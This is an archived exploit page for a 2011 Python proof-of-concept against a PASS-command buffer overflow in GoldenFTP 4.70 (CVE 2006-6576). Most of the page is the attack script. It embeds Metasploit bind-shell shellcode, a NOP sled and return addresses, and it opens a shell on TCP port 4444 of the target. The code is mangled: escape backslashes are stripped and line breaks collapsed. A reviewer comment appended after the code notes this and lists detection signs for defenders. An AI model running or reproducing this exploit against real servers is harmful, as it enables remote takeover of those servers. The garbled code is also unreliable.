
Golden FTP 4.70 Overflow

Posted on 06 July 2011

#!/usr/bin/python # Exploit Title: GoldenFTP 4.70 PASS exploit # Date: July 5, 2011 # Author: Joff Thyer (jsthyer@gmail.com) # Software Link: http://www.goldenftpserver.com/ # Version: 4.70 # Tested on: WinXP-SP0/SP2/SP3 # CVE: 2006-6576 # # based on exploit written by: # Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) # # Exploit tested on WinXP-SP0/SP2/SP3 # # Notes: # - Address 0x004c2030 contains a pointer to where the injected code address # must be written. # - IP address used to connect to FTP server impacts pointer to address. # - Opcodes starting at 0x004233EF are the exploited assembly sequence. # note: address gets moved into EAX, and control obtained through 'CALL EAX'. # import socket import sys import os import time # windows/shell_bind_tcp - 395 bytes # http://www.metasploit.com # AutoRunScript=, EXITFUNC=process, InitialAutoRunScript=, # LPORT=4444, RHOST= # Generated with: msfpayload windows/shell_bind_tcp r | msfencode -c 2 -t ruby -b 'x00x0ax0d' scode = "xdbxc7xbbx63x6fx93x72xd9x74x24xf4x5dx33xc9" +\n"xb1x5dx31x5dx17x83xc5x04x03x3ex7cx71x87x7a" +\n"x1bx36xc1x6bxc6x75xc8xffxd2x71xb6xd6xd3xcb" +\n"x1fx19xb1x38x23x9cx3dx3cx76x88x9fx1ex95xf4" +\n"x73x01x6bx64x44x28x9fx25x86x18x20xb6xe8xa5" +\n"xf3xa7x93xe1xcdx43x4cxb6x38x76xd6x8bx7fx16" +\n"xb3x91xf5x7axa9x60xdbx32xfcx5axc1xf7xf3xdb" +\n"xb2xd2x57x0cx3ex8bx19x11x11x98xaax18x4cxcd" +\n"x47xefx4dx16xf6xb8xe0x8fx44x36x6exf3x2ex97" +\n"xe5x3axabxc5x3cx02x82x20x6axecx17xdbx74xc6" +\n"xd0xcaxbdx3dxf1x61xa2xc2x96xfcx30x7ax29xa1" +\n"x5cxe6x23x1ex57x09x66x06x8dxe9x52x6axb2x98" +\n"x9ax07xd7x96x77xd0x06x23x65x17xbbxf6xbax6b" +\n"x44x8exe2x26x10xe7x71x4cx5bx21xbax83xfcxce" +\n"x48x90x51x30xfax87x84xdex21x8bxc9x2fxa6xff" +\n"xe5xf5x18x0cx59x98x82x8exf7x83x94x04x6fxfe" +\n"x2cxbdx29xedxeex89xacxd5xb3x94xe7xb7x10x82" +\n"x51xf5x95x13x84x44xc8x53x24x7ex3ax22x60xe7" +\n"xe0xc9x63x1bx59x53x78x67x37x80x06x97x8fxde" +\n"x19x30xa2xa5x16x8exe6x6bx04x68xadx48xfdxd1" 
+\n"xd2x24x1ex24xf8x14x23x14xd8xf2x68xe3x85x51" +\n"xb8xddx95x37xdax59xe9x49xf5xa1x74x40xadxbe" +\n"x5fx48x03xa5xa5x36x0cx3ex32xa8x9fxdfxf9x28" +\n"x45xc1x7cxf3x03xcdx21x53x31x49xd1x5dx2ax43" +\n"x04x41x19xefx74xddx9exb7x4fx4ex21x59x8ax77" +\n"x57x9bx61xd3xa4x62x55xedxecx1exc0xacx2ax8f" +\n"x2bx7fx59xd4x84xfax8ax44xdcx1cx01xddxd0xfc" +\n"xdexb2x03xe5x8fx56x36x44xf9x91x40x32xb4xaa" +\n"x78xfex2f" if len(sys.argv) < 2: print "[-]Usage: %s <target> <platform>" % sys.argv[0] print " platform = (sp0|sp1|sp2|sp3)" sys.exit(0) target = sys.argv[1] platform="" if len(sys.argv) > 2: platform = sys.argv[2] if platform == "sp0" or platform == "sp1": retaddr="x69x3cxa9x00" elif platform == "sp2" or platform == "sp3": retaddr="x9dx3cxa9x00" else: platform="sp3" retaddr="x9dx3cxa9x00" nopsled = "x90"*32 padding = "x90" * (541 - len(target + scode + nopsled)) payload = nopsled + scode + padding + retaddr s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) print "[+] Golden FTP PASS Exploit, Author: Joff Thyer, 2011" print "[+] 'Show new connections' must be enabled in GoldenFTP in order" print "[+] for this exploit to succeed!" print "[+] Connecting: "+target try: s.connect((target,21)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[+] Sending payload..." s.send("USER anonymous ") s.recv(1024) s.send("PASS "+payload+" ") s.recv(1024) time.sleep(1) retval = os.system('netstat -na | find "4444"') if retval > 0: print "[-] Exploit failed" else: print "[+] Exploit succeeded!"
# NOTE(review): this listing is a whitespace-mangled paste of a single Python 2
# script (print statements, bare `except:`) collapsed onto two physical lines;
# the backslashes of its "\x.." string escapes have been stripped (the literals
# read "xdbxc7..." rather than "\xdb\xc7..."), and the literal "+\n" tokens mark
# where the original line breaks were. As shown it is not syntactically valid
# (the first line is entirely a comment after the shebang) and it is kept
# byte-identical here rather than repaired.
# What the page itself states, read from a defender's side: the affected product
# is GoldenFTP 4.70 (header cites CVE 2006-6576; the vendor's fixed version is
# not given here — TODO confirm before relying on an upgrade), the overflow is
# reached through the FTP PASS argument after an anonymous USER, the stated
# precondition is the server's "Show new connections" option being enabled, and
# the script's own success test is a listener on TCP port 4444 showing up in
# netstat. Observable signals for detection are therefore an FTP PASS argument
# padded to 541 bytes (nopsled + scode + padding + retaddr) and an unexpected
# listening port 4444 on the FTP host shortly after a login; the precondition
# suggests that option is worth disabling on any remaining 4.70 installs while
# the root cause is addressed by updating.

 
